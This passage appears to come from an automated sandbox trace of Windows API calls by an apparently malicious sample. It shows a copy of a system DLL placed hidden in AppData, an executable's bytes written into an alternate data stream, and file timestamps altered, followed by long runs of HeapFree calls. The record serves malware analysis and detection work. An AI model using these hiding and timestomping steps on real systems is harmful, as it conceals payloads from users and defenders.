ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.071] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.071] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.840] lstrcpyW (in: lpString1=0x787db4, lpString2="Arbiter" | out: lpString1="Arbiter") returned="Arbiter" [0031.840] CopyFileW (lpExistingFileName="\\\\?\\C:\\Windows\\system32\\sbeio.dll" (normalized: "c:\\windows\\system32\\sbeio.dll"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\arbiter"), bFailIfExists=1) returned 1 [0031.856] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter", dwFileAttributes=0x2) returned 1 [0031.856] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee0b8 | out: hHeap=0x6d0000) returned 1 [0031.856] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter", lpString2=":bin" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin" [0031.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\launchy.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0031.857] GetFileSize (in: hFile=0xc8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x112f90 [0031.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x112f92) returned 0x21c0020 [0031.857] ReadFile (in: hFile=0xc8, lpBuffer=0x21c0020, nNumberOfBytesToRead=0x112f90, lpNumberOfBytesRead=0x18feb4, lpOverlapped=0x0 | out: lpBuffer=0x21c0020*, lpNumberOfBytesRead=0x18feb4*=0x112f90, lpOverlapped=0x0) returned 1 [0031.886] CloseHandle (hObject=0xc8) returned 1 [0031.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\arbiter:bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0031.886] WriteFile (in: hFile=0xc8, lpBuffer=0x21c0020*, nNumberOfBytesToWrite=0x112f90, lpNumberOfBytesWritten=0x18fec0, lpOverlapped=0x0 | out: lpBuffer=0x21c0020*, lpNumberOfBytesWritten=0x18fec0*=0x112f90, lpOverlapped=0x0) returned 1 [0031.910] SetEndOfFile (hFile=0xc8) returned 1 [0031.910] CloseHandle (hObject=0xc8) returned 1 [0031.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x21c0020 | out: hHeap=0x6d0000) returned 1 [0031.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\arbiter:bin"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0031.927] SetFileTime (hFile=0xc8, lpCreationTime=0x79b2e0, lpLastAccessTime=0x79b2e0, lpLastWriteTime=0x79b2e0) returned 1 [0031.927] CloseHandle (hObject=0xc8) returned 1 [0031.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ffdc0 | out: hHeap=0x6d0000) returned 1 [0031.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ffe68 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fff20 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fffc0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700060 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700100 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7001a0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700250 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700300 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7003a8 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700450 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700510 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7005b8 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700658 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700700 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7007a0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700840 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7008e8 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700988 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701cd0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701da0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701e68 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701f38 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701fe0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702080 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702120 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7021c0 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702260 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702308 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7023a8 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702448 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702518 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7025e8 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7026b8 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702790 | out: hHeap=0x6d0000) returned 1 [0031.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702870 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702940 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702a08 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702ad0 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702b98 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702c68 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702d30 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702e08 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702ed0 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700a30 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700b08 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700be0 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700cc0 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700d90 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700e58 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700f30 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701018 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7010f8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7011d8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702fc8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7012a8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701378 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701448 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701518 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7030a0 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7015e8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7016b8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701780 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701850 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701920 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x704fc8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703178 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703250 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7019e8 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705098 | out: hHeap=0x6d0000) returned 1 [0031.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701ab0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705168 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705238 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705308 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7053d8 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x701b78 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7054a8 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x706fb0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705578 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703328 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705648 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707078 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705718 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7057e8 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707158 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707238 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703400 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707318 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7073c0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707460 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707510 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7075b0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707658 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707700 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7077c0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707868 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707920 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709908 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7099a0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709a48 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709af8 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ba0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709c38 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ce0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7079c0 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707a60 | out: hHeap=0x6d0000) returned 1 [0031.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707b00 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707ba0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707c40 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709d90 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e38 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ee0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f88 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bd78 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a030 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70be30 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a0d8 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a180 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a228 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bef0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bfa0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707ce0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707d80 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707e20 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a2d0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707ec0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a378 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c050 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c108 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a420 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a4c8 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707f60 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708000 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a570 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a618 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7080a0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a6c0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708140 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c1c0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7081e0 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a768 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a810 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a8b8 | out: hHeap=0x6d0000) returned 1 [0031.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a960 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70aa08 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70aab0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ab58 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ac00 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70aca8 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708280 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708320 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7083c0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ad50 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70adf8 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708460 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c278 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c330 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708500 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7085a0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708640 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7086e0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c3e8 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708780 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708820 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70aea0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70af48 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c498 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7088c0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708960 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c530 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708a00 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70aff0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c5e8 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c698 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708aa0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b098 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708b40 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b140 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708be0 | out: hHeap=0x6d0000) returned 1 [0031.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b1e8 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b290 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708c80 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d20 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708dc0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708e60 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708f00 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708fa0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c748 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c800 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709040 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c898 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7090e0 | out: 